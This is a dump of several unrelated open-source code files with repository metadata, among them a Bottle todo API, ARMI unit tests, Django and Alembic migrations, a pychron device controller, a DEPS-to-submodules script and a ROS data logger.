Trigger2027.Name = "Trigger2027"
Trigger2027.CalculateValue = CalculateTrigger2027
|
[
"aloelige@cern.ch"
] |
aloelige@cern.ch
|
f7543e5d841ceb31ee2674b563c1e772576e185c
|
366b2ff9cd498808438bf7c48f697c05b361d02c
|
/app.py
|
afd82cb98a6734228c58e3cf1b2d768b487eb5e6
|
[] |
no_license
|
c-bata/AngularJS-Bottle-TodoApp
|
1aef6b09fd85fabaa63898ab3fb9a2d586216b93
|
8f03820b7949b0c28477970c58f25ccd1856b2a9
|
refs/heads/master
| 2021-03-12T22:40:32.000758
| 2015-11-04T11:14:47
| 2015-11-04T11:14:47
| 38,732,944
| 2
| 0
| null | 2015-11-04T11:11:39
| 2015-07-08T05:02:47
|
Python
|
UTF-8
|
Python
| false
| false
| 1,290
|
py
|
from bottle import (
route, response, run, template, static_file, install, post, request
)
import json
import os
import jsonschema
import models
import schemas
BASE_DIR = os.path.dirname(os.path.abspath(__file__))
STATIC_DIR = os.path.join(BASE_DIR, 'static')
install(models.plugin)
@route('/')
def index():
    """Serve the task-list page template."""
    return template('tasks')
@route('/api/tasks')
def tasks(db):
    """Return every task as JSON: {"tasks": [...]}; *db* is injected by the plugin."""
    response.content_type = 'application/json'
    tasks = [task.serialize for task in db.query(models.Task).all()]
    return json.dumps({'tasks': tasks})
@post('/api/tasks')
def create_task(db):
    """Validate the JSON body against the task schema and persist a new Task."""
    response.content_type = 'application/json'
    try:
        jsonschema.validate(request.json, schemas.task_schema)
        task = models.Task(title=request.json['title'])
        db.add(task)
        db.commit()  # commit here, otherwise the id and other default values are not yet available to return
        return json.dumps(task.serialize)
    except jsonschema.ValidationError:
        # NOTE(review): bottle's documented way to set the code is
        # ``response.status = 400``; verify that assigning ``status_code``
        # actually changes the returned status here.
        response.status_code = 400
        return json.dumps({
            'error': {'message': 'Validation is failed...'}
        })
@route('/static/<filename:path>')
def send_static(filename):
    """Serve assets from the static/ directory."""
    return static_file(filename, root=STATIC_DIR)
if __name__ == '__main__':
    # Development server only: debug output and auto-reload enabled.
    run(host='localhost', port=8080, debug=True, reloader=True)
|
[
"contact@c-bata.link"
] |
contact@c-bata.link
|
bbe8129b09d85cd20a4dcbad5bcd0f14703eb61a
|
ae79aa8458230fe2331b267308a29adff215bbfe
|
/armi/nuclearDataIO/tests/test_xsCollections.py
|
9088f3c05a114f56505279c386786363dec4e6f4
|
[
"LicenseRef-scancode-free-unknown",
"Apache-2.0"
] |
permissive
|
paulromano/armi
|
3727cf3c52de5e412e8db4d5bf5d9998a720616c
|
6c4fea1ca9d256a2599efd52af5e5ebe9860d192
|
refs/heads/master
| 2023-01-10T05:43:27.691791
| 2020-08-07T00:33:35
| 2020-08-07T00:33:35
| 285,824,692
| 1
| 0
|
Apache-2.0
| 2020-08-07T12:32:54
| 2020-08-07T12:32:53
| null |
UTF-8
|
Python
| false
| false
| 3,832
|
py
|
# Copyright 2019 TerraPower, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Module that tests methods within xsCollections
"""
import unittest
from armi.nuclearDataIO import xsCollections
from armi import nuclearDataIO
from armi.tests import ISOAA_PATH
from armi.physics.neutronics.tests import test_cross_section_manager
class TestXsCollections(unittest.TestCase):
    """Unit tests for xsCollections micro/macro cross-section handling."""
    @classmethod
    def setUpClass(cls):
        # Load the shared ISOTXS microscopic library once for all tests.
        cls.microLib = nuclearDataIO.ISOTXS(ISOAA_PATH)
    def setUp(self):
        self.mc = xsCollections.MacroscopicCrossSectionCreator()
        # Mock block with two nuclides so macro XS reduce to a simple
        # density-weighted sum that the tests can recompute by hand.
        self.block = test_cross_section_manager.MockBlock()
        self.block.setNumberDensity("U235", 0.02)
        self.block.setNumberDensity("FE", 0.01)
    def test_generateTotalScatteringMatrix(self):
        """Generates the total scattering matrix by summing elastic, inelastic, and n2n scattering matrices."""
        nuc = self.microLib.nuclides[0]
        totalScatter = nuc.micros.getTotalScatterMatrix()
        # The 2.0 factor on n2n mirrors getTotalScatterMatrix's treatment --
        # presumably because each (n,2n) reaction emits two neutrons.
        self.assertAlmostEqual(
            totalScatter[0, 0],
            (
                nuc.micros.elasticScatter[0, 0]
                + nuc.micros.inelasticScatter[0, 0]
                + 2.0 * nuc.micros.n2nScatter[0, 0]
            ),
        )
    def test_generateTotalScatteringMatrixWithMissingData(self):
        """
        Generates the total scattering matrix by summing elastic and n2n scattering matrices.
        Notes
        -----
        This tests that the total scattering matrix can be produced when the inelastic scattering matrix is not defined.
        """
        nuc = self.microLib.nuclides[0]
        nuc.micros.inelasticScatter = None
        totalScatter = nuc.micros.getTotalScatterMatrix()
        self.assertAlmostEqual(
            totalScatter[0, 0],
            (nuc.micros.elasticScatter[0, 0] + 2.0 * nuc.micros.n2nScatter[0, 0]),
        )
    def test_createMacrosFromMicros(self):
        # Recompute the macroscopic fission/absorption XS as density-weighted
        # sums of the micros and compare against the creator's result.
        self.mc.createMacrosFromMicros(self.microLib, self.block)
        totalMacroFissionXs = 0.0
        totalMacroAbsXs = 0.0
        for nuc, density in self.mc.densities.items():
            nuclideXS = self.mc.microLibrary.getNuclide(nuc, "AA")
            for microXs in nuclideXS.micros.fission:
                totalMacroFissionXs += microXs * density
            for microXsName in xsCollections.ABSORPTION_XS:
                for microXs in getattr(nuclideXS.micros, microXsName):
                    totalMacroAbsXs += microXs * density
        self.assertAlmostEqual(sum(self.mc.macros.fission), totalMacroFissionXs)
        self.assertAlmostEqual(sum(self.mc.macros.absorption), totalMacroAbsXs)
    def test_collapseCrossSection(self):
        """
        Tests cross section collapsing
        Notes
        -----
        The expected 1 group cross section was generated by running the collapse cross section method. This tests
        that this method has not been modified to produce a different result.
        """
        # Regression pin: the expected value is the method's own historical
        # output, not an independently derived number.
        expected1gXs = 2.35725262208
        micros = self.microLib["U235AA"].micros
        # Synthetic monotonically decreasing 33-group flux for the collapse.
        flux = list(reversed(range(33)))
        self.assertAlmostEqual(
            micros.collapseCrossSection(micros.nGamma, flux), expected1gXs
        )
if __name__ == "__main__":
# import sys;sys.argv = ['', 'TestXsCollections.test_generateTotalScatteringMatrix']
unittest.main()
|
[
"ntouran@terrapower.com"
] |
ntouran@terrapower.com
|
699ea1d33083dbe690ac1495e2b02345c3ab0360
|
9a1538123b8abec14410dad46c437cf735684dd9
|
/news/migrations/0001_initial.py
|
552caaeb8e0ba8c9555709ab96355304db3f721e
|
[] |
no_license
|
asmuratbek/zastroy24
|
deec6bd65229aeb29eb313d915c6c47ca036a8aa
|
d68ce21beefc644752a1271a4d8981cd2423afba
|
refs/heads/master
| 2020-04-27T18:44:26.845151
| 2019-03-08T18:09:13
| 2019-03-08T18:09:13
| 174,585,168
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,000
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.4 on 2017-09-01 14:58
from __future__ import unicode_literals
import ckeditor_uploader.fields
from django.db import migrations, models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Post',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('is_active', models.BooleanField(default=True, verbose_name='\u0410\u043a\u0442\u0438\u0432\u043d\u0430\u044f \u043d\u043e\u0432\u043e\u0441\u0442\u044c?')),
('title', models.CharField(help_text='\u041e\u043d \u0436\u0435 \u0438 meta_title', max_length=255, verbose_name='\u041d\u0430\u0438\u043c\u0435\u043d\u043e\u0432\u0430\u043d\u0438\u0435 \u043d\u043e\u0432\u043e\u0441\u0442\u0438')),
('slug', models.CharField(help_text='\u041d\u0443\u0436\u0435\u043d \u0434\u043b\u044f URL', max_length=255, verbose_name='slug')),
('preview', models.ImageField(blank=True, null=True, upload_to='news/', verbose_name='\u041f\u0440\u0435\u0434\u043e\u0441\u043c\u043e\u0442\u0440 \u043d\u043e\u0432\u043e\u0441\u0442\u0438')),
('content', ckeditor_uploader.fields.RichTextUploadingField(verbose_name='\u0422\u0435\u043b\u043e \u043d\u043e\u0432\u043e\u0441\u0442\u0438')),
('created_at', models.DateTimeField(auto_now_add=True, verbose_name='\u0414\u0430\u0442\u0430 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u044f')),
('updated_at', models.DateTimeField(auto_now=True, verbose_name='\u0414\u0430\u0442\u0430 \u043e\u0431\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f')),
],
options={
'verbose_name': '\u043d\u043e\u0432\u043e\u0441\u0442\u044c',
'verbose_name_plural': '\u041d\u043e\u0432\u043e\u0441\u0442\u0438',
},
),
]
|
[
"asmuratbek@gmail.com"
] |
asmuratbek@gmail.com
|
9e02f1f5e378de2d29593ff5b0c7234dc46017ae
|
ff81a9d7880f1b85a1dc19d5eba5ac72d7179c86
|
/pychron/hardware/apis_controller.py
|
3f9007cdfd86fd568ce9d3cbf6a0909680c9efef
|
[
"Apache-2.0"
] |
permissive
|
UManPychron/pychron
|
2fb7e479a9f492423c0f458c70102c499e1062c4
|
b84c9fd70072f9cbda30abe2c471e64fe3dd75d8
|
refs/heads/develop
| 2022-12-03T23:32:45.579326
| 2020-01-29T19:02:20
| 2020-01-29T19:02:20
| 36,100,637
| 0
| 0
| null | 2015-05-23T00:10:06
| 2015-05-23T00:10:05
| null |
UTF-8
|
Python
| false
| false
| 5,881
|
py
|
# ===============================================================================
# Copyright 2014 Jake Ross
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===============================================================================
# ============= enthought library imports =======================
from __future__ import absolute_import
import time
from traits.api import Property, provides
# ============= standard library imports ========================
# ============= local library imports ==========================
from pychron.hardware.actuators.iactuator import IActuator
from pychron.hardware.core.core_device import CoreDevice
CMD_MAP = {'list_blanks': '100',
'list_airs': '101',
'last_runid': '102',
'pipette_record': '103',
'status': '104',
'load_blank': '105',
'load_air': '106',
'cancel': '107',
'set_external_pumping': '108'}
STATUS_MAP = {'0': 'Idle',
'1': 'Pumping pipette',
'2': 'Loading pipette',
'3': 'Expanding pipettes',
'4': 'Expansion complete'}
@provides(IActuator)
class ApisController(CoreDevice):
connection_url = Property
# close `isolation_valve` `isolation_delay` seconds after loading of pipette started
isolation_delay = 25
# name of valve to make analytical section static
isolation_valve = 'U'
isolation_info = 'isolate microbone'
# instead of the simple wait/close sequence use the a gosub
# use this for a more complex/flexible pattern i.e open/close multiple valves
isolation_gosub = None
def load_additional_args(self, config):
v = self.config_get(config, 'Isolation', 'valve', optional=False, default='U')
self.isolation_delay = self.config_get(config, 'Isolation', 'delay', optional=False, cast='int', default=25)
self.isolation_info = self.config_get(config, 'Isolation', 'info', optional=True)
self.isolation_gosub = self.config_get(config, 'Isolation', 'gosub', optional=True)
self.isolation_valve = v.replace('"', '').replace("'", '')
return True
#iacuator protocol
def close_channel(self, obj):
self.set_external_pumping(False)
return True
def open_channel(self, obj):
self.set_external_pumping(True)
return True
def get_channel_state(self, obj):
pass
def get_lock_state(self, obj):
pass
def script_loading_block(self, script, **kw):
"""
wait for script loading to complete.
this process has three steps.
1. wait for loading to start. status changes from 1 to 2
2. if isolation_gosub
do gosub
else
wait `isolation_delay` seconds then close the `isolation valve`
3. wait for apis script to complete
return True if completed successfully
"""
script.console_info('waiting for pipette to load')
if not self.blocking_poll('loading_started', script=script, **kw):
return
script.console_info('loading started')
if self.isolation_gosub:
self.debug('executing isolation gosub= {}'.format(self.isolation_gosub))
script.gosub(self.isolation_gosub)
else:
ws = self.isolation_delay
self.debug('wait {}s'.format(ws))
time.sleep(ws)
if self.isolation_info:
script.console_info(self.isolation_info)
iv = self.isolation_valve
iv=iv.split(',')
for v in iv:
script.close(v.strip())
script.console_info('wait for apis to complete expansion')
return self.blocking_poll('get_loading_complete', script=script, **kw)
def make_command(self, cmd):
try:
return CMD_MAP[cmd]
except KeyError:
return 'invalid command cmd={}'.format(cmd)
def load_blank(self, name):
cmd = self.make_command('load_blank')
self.ask('{},{}'.format(cmd, name))
def load_pipette(self, name):
cmd = self.make_command('load_air')
self.ask('{},{}'.format(cmd, name))
def get_status(self):
cmd = self.make_command('status')
status = self.ask(cmd)
return status
def get_loading_status(self):
status = self.get_status()
try:
status = STATUS_MAP[status]
return status
except KeyError:
pass
def loading_started(self):
status = self.get_loading_status()
return status == 'Loading pipette'
def get_loading_complete(self):
status = self.get_loading_status()
return status == 'Expansion complete'
def get_available_blanks(self):
cmd = self.make_command('list_blanks')
return self.ask(cmd)
def get_available_airs(self):
cmd = self.make_command('list_airs')
return self.ask(cmd)
def set_external_pumping(self, state):
cmd = self.make_command('set_external_pumping')
cmd = '{},{}'.format(cmd, 'true' if state else 'false')
return self.ask(cmd)
def _get_connection_url(self):
return '{}:{}'.format(self.communicator.host, self.communicator.port)
# ============= EOF =============================================
|
[
"jirhiker@gmail.com"
] |
jirhiker@gmail.com
|
59f35ce862fba5572d3fa349af79c857f80998f2
|
5b7af6548668085da9a6ab86f564538ee73c4865
|
/build/scripts/slave/recipe_modules/sync_submodules/resources/deps2submodules.py
|
7596609ca687bffb82ee3c78743d82aa56d0c70d
|
[
"BSD-3-Clause"
] |
permissive
|
elastos/Elastos.APP.Android.ShiJiuTV
|
463a986450a915f7b3066e6a03aca903cf56f69b
|
f77189a2b8df86028adc68105988710d16ce012b
|
refs/heads/master
| 2023-03-18T03:11:58.337349
| 2018-03-12T08:50:57
| 2018-03-13T11:10:27
| 124,007,751
| 0
| 1
| null | 2022-10-03T03:30:29
| 2018-03-06T02:21:25
| null |
UTF-8
|
Python
| false
| false
| 5,186
|
py
|
#!/usr/bin/python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Read DEPS and use the information to update git submodules"""
import argparse
import logging
import os
import re
import subprocess
import sys
from deps_utils import GetDepsContent
SHA1_RE = re.compile(r'[0-9a-fA-F]{40}')
SHA1_REF_RE = re.compile(r'^([0-9a-fA-F]{40})\s+refs/[\w/]+\s*')
def SanitizeDeps(submods, path_prefix):
"""
Look for conflicts (primarily nested submodules) in submodule data. In the
case of a conflict, the higher-level (shallower) submodule takes precedence.
Modifies the submods argument in-place.
"""
ret = {}
for name, value in submods.iteritems():
if not name.startswith(path_prefix):
logging.warning('Dropping submodule "%s", because it is outside the '
'working directory "%s"', name, path_prefix)
continue
# Strip the prefix from the submodule name.
name = name[len(path_prefix):]
parts = name.split('/')[:-1]
while parts:
may_conflict = '/'.join(parts)
if may_conflict in submods:
logging.warning('Dropping submodule "%s", because it is nested in '
'submodule "%s"', name, may_conflict)
break
parts.pop()
ret[name] = value
return ret
def CollateDeps(deps_content):
"""
Take the output of deps_utils.GetDepsContent and return a hash of:
{ submod_name : [ [ submod_os, ... ], submod_url, submod_sha1 ], ... }
"""
spliturl = lambda x: list(x.partition('@')[0::2]) if x else [None, None]
submods = {}
# Non-OS-specific DEPS always override OS-specific deps. This is an interim
# hack until there is a better way to handle OS-specific DEPS.
for (deps_os, val) in deps_content[1].iteritems():
for (dep, url) in val.iteritems():
submod_data = submods.setdefault(dep, [[]] + spliturl(url))
submod_data[0].append(deps_os)
for (dep, url) in deps_content[0].iteritems():
submods[dep] = [['all']] + spliturl(url)
return submods
def WriteGitmodules(submods):
"""
Take the output of CollateDeps, use it to write a .gitmodules file and
return a map of submodule name -> sha1 to be added to the git index.
"""
adds = {}
with open('.gitmodules', 'w') as fh:
for name, (os, url, sha1) in sorted(submods.iteritems()):
if not url:
continue
if url.startswith('svn://'):
logging.warning('Skipping svn url %s', url)
continue
print >> fh, '[submodule "%s"]' % name
print >> fh, '\tpath = %s' % name
print >> fh, '\turl = %s' % url
print >> fh, '\tos = %s' % ','.join(os)
if not sha1:
sha1 = 'master'
# Resolve the ref to a sha1 hash.
if not SHA1_RE.match(sha1):
if sha1.startswith('origin/'):
sha1 = sha1[7:]
output = subprocess.check_output(['git', 'ls-remote', url, sha1])
match = SHA1_REF_RE.match(output)
if not match:
logging.warning('Could not resolve ref %s for %s', sha1, url)
continue
logging.info('Resolved %s for %s to %s', sha1, url, match.group(1))
sha1 = match.group(1)
logging.info('Added submodule %s revision %s', name, sha1)
adds[name] = sha1
subprocess.check_call(['git', 'add', '.gitmodules'])
return adds
def RemoveObsoleteSubmodules():
"""
Delete from the git repository any submodules which aren't in .gitmodules.
"""
lsfiles = subprocess.check_output(['git', 'ls-files', '-s'])
for line in lsfiles.splitlines():
if not line.startswith('160000'):
continue
_, _, _, path = line.split()
cmd = ['git', 'config', '-f', '.gitmodules',
'--get-regexp', 'submodule\..*\.path', '^%s$' % path]
try:
with open(os.devnull, 'w') as nullpipe:
subprocess.check_call(cmd, stdout=nullpipe)
except subprocess.CalledProcessError:
subprocess.check_call(['git', 'update-index', '--force-remove', path])
def main():
logging.basicConfig(level=logging.INFO)
parser = argparse.ArgumentParser()
parser.add_argument('--path-prefix',
default=os.path.basename(os.getcwd()) + '/',
help='Ignore any dep outside this prefix. DEPS files can '
"specify dependencies in the repo's parent directory, "
'so the default here is to ignore anything outside the '
"current directory's basename")
parser.add_argument('deps_file', default='DEPS', nargs='?')
options = parser.parse_args()
if not options.path_prefix.endswith('/'):
parser.error("--path-prefix '%s' must end with a '/'" % options.path_prefix)
adds = WriteGitmodules(
SanitizeDeps(
CollateDeps(GetDepsContent(options.deps_file)),
options.path_prefix))
RemoveObsoleteSubmodules()
for submod_path, submod_sha1 in adds.iteritems():
subprocess.check_call(['git', 'update-index', '--add',
'--cacheinfo', '160000', submod_sha1, submod_path])
return 0
if __name__ == '__main__':
sys.exit(main())
|
[
"xiaokun.mengxk@qcast.cn"
] |
xiaokun.mengxk@qcast.cn
|
06eab32812567f359d7aea988deb216e87b8b3e1
|
d114a6576659a4a299f5965032489d2abbe41282
|
/src/computer_vision/nodes/synchronize_img_command_lidar.py
|
9c7be96b236672ac1cb80aa900f9db16b72f267c
|
[
"MIT"
] |
permissive
|
mldiego/Platooning-F1Tenth
|
dbc23ff7af3397716be1bbfdf9881da799206855
|
ec5eadb137da8428642b3ffd1b8ca31fde4f6dff
|
refs/heads/master
| 2023-03-04T21:08:12.799694
| 2021-02-18T00:11:46
| 2021-02-18T00:11:46
| 230,968,509
| 0
| 0
|
MIT
| 2021-02-16T17:34:01
| 2019-12-30T19:25:59
|
Python
|
UTF-8
|
Python
| false
| false
| 4,887
|
py
|
#!/usr/bin/env python
import rospy
import cv2
from std_msgs.msg import String
from sensor_msgs.msg import Image, CompressedImage,LaserScan
from cv_bridge import CvBridge, CvBridgeError
from message_filters import ApproximateTimeSynchronizer, Subscriber
from ackermann_msgs.msg import AckermannDriveStamped
import imutils
from race.msg import drive_param
import os
import rospkg
import numpy as np
# import sys so we can use packages outside of this folder in
# either python 2 or python 3, I know it's janky, chill
import sys
import os
from pathlib import Path
#insert parent directory into the path
sys.path.insert(0,str(Path(os.path.abspath(__file__)).parent.parent))
from preprocessing.utils import ImageUtils
class MessageSynchronizer:
''' Gathers messages with vehicle information that have similar time stamps
/camera/zed/rgb/image_rect_color/compressed: 18 hz
/camera/zed/rgb/image_rect_color: 18 hz
/vesc/ackermann_cmd_mux/input/teleop: 40 hz
'''
def __init__(self,racecar_name,vesc_name,data_path):
self.image_topic = racecar_name+'/camera/zed/rgb/image_rect_color'
self.drive_topic = vesc_name+'/ackermann_cmd_mux/input/teleop'
self.lidar_topic = racecar_name+'/scan'
print(self.image_topic,self.drive_topic,self.lidar_topic)
self.image_rect_color=Subscriber(self.image_topic,Image)
self.ackermann_stamped=Subscriber(self.drive_topic,AckermannDriveStamped)
self.lidar_sub=Subscriber(self.lidar_topic,LaserScan)
r = rospkg.RosPack()
self.util=ImageUtils()
self.save_path_root=os.path.sep.join([r.get_path('computer_vision'),data_path])
self.cv_bridge=CvBridge()
self.count=0
self.save_count=0
#create the time synchronizer
self.sub = ApproximateTimeSynchronizer([self.image_rect_color,self.ackermann_stamped,self.lidar_sub], queue_size = 20, slop = 0.08)
#register the callback to the synchronizer
self.sub.registerCallback(self.master_callback)
#callback for the synchronized messages
#Note: a negative value means turning to the right, a postive value means turning to the left
def master_callback(self,image,ackermann_msg,lidar_msg): #drive_param):
#convert rosmsg to cv image
try:
cv_image=self.cv_bridge.imgmsg_to_cv2(image,"bgr8")
self.count+=1
except CvBridgeError as e:
print(e)
#convert the steering command to a string to I can store it with the image name
#for efficient data storage
command='%.10f' % ackermann_msg.drive.steering_angle
#replace the period with ~ so it's a valid filename
command=command.replace('.','~')
#save path
save_path=os.path.join(self.save_path_root,self.label_image(ackermann_msg.drive.steering_angle),str(rospy.Time.now())+'~'+command+'.png')
limited_ranges=np.asarray(lidar_msg.ranges)
indices=np.where(limited_ranges>=10.0)[0]
limited_ranges[indices]=10.0
limited_ranges= limited_ranges[29:1053]
limited_ranges = limited_ranges.reshape((32,32,1))
limited_ranges = limited_ranges
if(self.count % 1==0):
dirPath = os.path.split(save_path)[0]
if not 'straight' in dirPath and 'weak_right' not in dirPath and 'weak_left' not in dirPath:
self.save_image(cv_image,save_path)
np.save(save_path.replace(".png",".npy"),limited_ranges)
self.save_count+=1
self.count+=1
#function that categorizes images into left, weak_left, straight, weak_right, right
def label_image(self,steering_angle):
if(steering_angle<-0.261799):
return "right"
elif(steering_angle>0.261799):
return "left"
elif(steering_angle<-0.0523599 and steering_angle>-0.261799):
return "weak_right"
elif(steering_angle>0.0523599 and steering_angle<0.261799):
return "weak_left"
else:
return "straight"
def save_image(self,image,path):
dirPath = os.path.split(path)[0]
# if the output directory does not exist, create it
if not os.path.exists(dirPath):
os.makedirs(dirPath)
print('does not exist')
print(path)
cv2.imwrite(path,image)
if __name__=='__main__':
rospy.init_node('image_command_sync')
args = rospy.myargv()[1:]
# get the racecar name so we know what to subscribe to
racecar_name=args[0]
# get the name of the vesc for the car
vesc_name=args[1]
# path where to store the dataset
data_path = args[2]
# initialize the message filter
mf=MessageSynchronizer(racecar_name,vesc_name,data_path)
# spin so that we can receive messages
rospy.spin()
|
[
"pmusau13ster@gmail.com"
] |
pmusau13ster@gmail.com
|
ab6cd8266c32908502d62a2aa3848a27d9d5182b
|
4014aa4a5ce0af0f10016b8fd056e26c147e8b42
|
/stdlib/src/hmap/std/matching/topic_based/topic_types/flat_numbers.py
|
4d48e4cc7bf94ad24eac0e2ff27f4449bf6692f1
|
[
"MIT"
] |
permissive
|
gregjhansell97/hive-map-python-3
|
d09ac97a89a9cbddf26ab1c91f698d9e44941144
|
d3d4f826f154a2aeea7e251266c221f629574b83
|
refs/heads/master
| 2020-07-31T12:23:55.983819
| 2020-04-28T23:52:49
| 2020-04-28T23:52:49
| 210,602,776
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,012
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from abc import abstractmethod
import struct
from hmap.interface.matching.topic_based import HashableTopic
class FlatNumber(HashableTopic):
fmt = ""
def __init__(self, content):
# TODO move to super class (FlatNumber)
self.__raw = struct.pack(self.fmt, content)
self.__content = content
@property
def content(self):
return self.__content
def calcsize(self):
return struct.calcsize(self.fmt)
@classmethod
def serialize(cls, instance):
return instance.__raw
@classmethod
def deserialize(cls, raw_data, lazy=False):
return cls(struct.unpack_from(cls.fmt, raw_data, offset=0)[0])
# return remaining bytes
class FlatByte(FlatNumber):
fmt = "b"
class FlatUByte(FlatNumber):
fmt = "B"
class FlatInt(FlatNumber):
fmt = "i"
class FlatUInt(FlatNumber):
fmt = "I"
# hide parent class
__all__ = ["FlatByte", "FlatUByte", "FlatInt", "FlatUInt"]
|
[
"gregjhansell@gmail.com"
] |
gregjhansell@gmail.com
|
fc81fc7ae77bb68bbe360d676d6ea0f9dc2ffdda
|
867796f20586cfa70422945d98e7d5e99edbabc2
|
/contactista/migrations/ed99772734e1_initial_revision.py
|
a7f31619c7e62a4b989f9d250739bd7809b112ba
|
[
"MIT"
] |
permissive
|
rizplate/contactista
|
500cf7f640b3db94d0b49b921e4b09abdfc56d5b
|
8b3030487518cd4767078703aee04041d2004725
|
refs/heads/master
| 2020-03-28T11:37:02.932371
| 2017-09-15T18:55:52
| 2017-09-15T18:56:13
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,048
|
py
|
"""Initial revision
Revision ID: ed99772734e1
Revises:
Create Date: 2017-08-01 12:48:40.754913
"""
import os
import json
from alembic import op
import sqlalchemy as sa
from sqlalchemy.schema import Sequence, CreateSequence, DropSequence
# revision identifiers, used by Alembic.
revision = 'ed99772734e1'
down_revision = None
branch_labels = ('default',)
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
pronouns_table = op.create_table('pronouns',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('subject_pronoun', sa.String(length=50), nullable=False),
sa.Column('object_pronoun', sa.String(length=50), nullable=False),
sa.Column('possessive_determiner', sa.String(length=50), nullable=False),
sa.Column('possessive_pronoun', sa.String(length=50), nullable=False),
sa.Column('reflexive_pronoun', sa.String(length=50), nullable=False),
sa.PrimaryKeyConstraint('id')
)
role_table = op.create_table('role',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(length=80), nullable=False),
sa.Column('description', sa.String(length=255), nullable=True),
sa.PrimaryKeyConstraint('id'),
sa.UniqueConstraint('name')
)
op.create_table('user',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('username', sa.String(length=255), nullable=False),
sa.Column('password', sa.String(length=255), nullable=True),
sa.Column('active', sa.Boolean(), nullable=True),
sa.Column('confirmed_at', sa.DateTime(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
op.create_index(op.f('ix_user_username'), 'user', ['username'], unique=True)
op.create_table('contact',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('user_id', sa.Integer(), nullable=False),
sa.Column('note', sa.Text(), nullable=True),
sa.Column('note_format', sa.String(length=20), nullable=True),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], ),
sa.PrimaryKeyConstraint('id')
)
op.create_table('roles_users',
sa.Column('user_id', sa.Integer(), nullable=True),
sa.Column('role_id', sa.Integer(), nullable=True),
sa.ForeignKeyConstraint(['role_id'], ['role.id'], ),
sa.ForeignKeyConstraint(['user_id'], ['user.id'], )
)
op.create_table('contact_email',
sa.Column('contact_id', sa.Integer(), nullable=False),
sa.Column('category', sa.String(length=50), nullable=False),
sa.Column('position', sa.Integer(), nullable=False),
sa.Column('email', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['contact_id'], ['contact.id'], ),
sa.PrimaryKeyConstraint('contact_id', 'category')
)
op.execute(CreateSequence(Sequence('contact_email_position')))
op.create_table('contact_name',
sa.Column('contact_id', sa.Integer(), nullable=False),
sa.Column('category', sa.String(length=50), nullable=False),
sa.Column('position', sa.Integer(), nullable=False),
sa.Column('name', sa.Text(), nullable=False),
sa.ForeignKeyConstraint(['contact_id'], ['contact.id'], ),
sa.PrimaryKeyConstraint('contact_id', 'category')
)
op.execute(CreateSequence(Sequence('contact_name_position')))
op.create_table('contact_pronouns',
sa.Column('contact_id', sa.Integer(), nullable=False),
sa.Column('pronouns_id', sa.Integer(), nullable=False),
sa.Column('position', sa.Integer(), nullable=False),
sa.ForeignKeyConstraint(['contact_id'], ['contact.id'], ),
sa.ForeignKeyConstraint(['pronouns_id'], ['pronouns.id'], ),
sa.PrimaryKeyConstraint('contact_id', 'pronouns_id')
)
op.execute(CreateSequence(Sequence('contact_pronouns_position')))
# ### end Alembic commands ###
# Seed database with default data
op.bulk_insert(role_table, rows=[
{"name": "superuser", "description": "Unlimited access"},
])
pronouns_fixture_path = os.path.join(
os.path.dirname(os.path.dirname(__file__)),
"fixtures",
"pronouns.json",
)
with open(pronouns_fixture_path) as f:
pronouns_list = json.load(f)
pronouns_objs = [{
"subject_pronoun": line[0],
"object_pronoun": line[1],
"possessive_determiner": line[2],
"possessive_pronoun": line[3],
"reflexive_pronoun": line[4],
} for line in pronouns_list]
op.bulk_insert(pronouns_table, rows=pronouns_objs)
def downgrade():
for seqname in ('contact_pronouns_position', 'contact_name_position',
'contact_email_position',
):
op.execute(DropSequence(Sequence(seqname)))
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('contact_pronouns')
op.drop_table('contact_name')
op.drop_table('contact_email')
op.drop_table('roles_users')
op.drop_table('contact')
op.drop_index(op.f('ix_user_username'), table_name='user')
op.drop_table('user')
op.drop_table('role')
op.drop_table('pronouns')
# ### end Alembic commands ###
|
[
"david@davidbaumgold.com"
] |
david@davidbaumgold.com
|
b6ddfd1034f68fcb04d7dd7367c60d64d74c567f
|
0da8fdae806b73e9dc57e052dcf1171c5a2c7f28
|
/01_Python基础/05_高级数据类型/study_17_字符串的查找和替换.py
|
21ac39e23afe3709e5be97d72fd7c073e80aff77
|
[] |
no_license
|
xujinshan361/python_study_code
|
ed37db128c55ee2ad9f7b2db04785c632a7115d4
|
e6ce0bdd8243dfaadf56213ef0120d215de0d0cd
|
refs/heads/master
| 2020-12-10T12:19:45.792310
| 2020-01-13T12:48:22
| 2020-01-13T12:48:22
| 233,592,034
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 666
|
py
|
